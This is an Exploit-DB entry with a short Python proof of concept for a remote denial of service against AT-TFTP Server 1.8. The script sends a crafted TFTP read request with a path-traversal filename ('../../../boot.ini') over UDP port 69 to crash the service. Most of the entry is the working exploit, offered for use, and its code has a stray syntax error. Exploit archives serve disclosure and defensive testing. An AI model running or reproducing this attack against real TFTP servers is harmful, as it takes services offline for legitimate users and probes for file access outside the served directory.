AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service

Author: Antu Sanadi
type: dos
platform: windows
port: 
date_added: 2011-04-25 
date_updated: 2016-09-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comat-tftpd.exe

source: https://www.securityfocus.com/bid/47561/info

AT-TFTP is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

AT-TFTP 1.8 is affected; other versions may also be vulnerable.

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

addr = (host,port)1

data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))